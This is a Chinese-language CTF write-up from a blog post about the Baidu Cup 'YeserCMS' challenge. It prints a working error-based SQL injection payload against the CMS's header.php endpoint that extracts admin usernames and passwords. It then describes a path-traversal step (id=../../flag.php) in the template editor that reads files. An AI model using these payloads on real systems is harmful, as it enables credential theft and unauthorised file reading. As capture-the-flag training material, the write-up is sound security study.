百度杯_YeserCMS

百度杯_YeserCMS

题目一看以为是YeserCMS,百度发现是由WP,猜测可能是改名了。

在用了挺多的cms识别都没识别出来后(可能是我工具太老旧了),最后在文档下载的评论处发现了真的CMS名称。

img

结合题目的tips:flag在网站根目录下的flag.php中,应该是要文件读取,那么我们找一找文件读取漏洞,发现要进后台,再找一找注入,找到了一个报错注入。利用注入就得到了账号密码。

访问 url/celive/live/header.php
payload:

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx%2527%252C%2528UpdateXML%25281%252CCONCAT%25280x5b%252Cmid%2528%2528SELECT%252f%252a%252a%252fGROUP_CONCAT%2528concat%2528username%252C%2527%257C%2527%252Cpassword%2529%2529%2520from%2520yesercms_user%2529%252C1%252C32%2529%252C0x5d%2529%252C1%2529%2529%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%2529--%2520</q></xjxquery>

img

然后使用文件读取漏洞,在模板->模板结构,点击编辑,然后抓包,修改id为../../flag.php即可获取flag。

img

img

img

作者:qianyuzz

出处:https://www.cnblogs.com/qianyuzz/p/17397548.html

版权:本作品采用「署名-非商业性使用-相同方式共享 4.0 国际」许可协议进行许可。

posted @   qianyuzz  阅读(90)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· winform 绘制太阳,地球,月球 运作规律
· AI与.NET技术实操系列(五):向量存储与相似性搜索在 .NET 中的实现
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 上周热点回顾(3.3-3.9)
more_horiz
keyboard_arrow_up dark_mode palette
选择主题
点击右上角即可分享
微信分享提示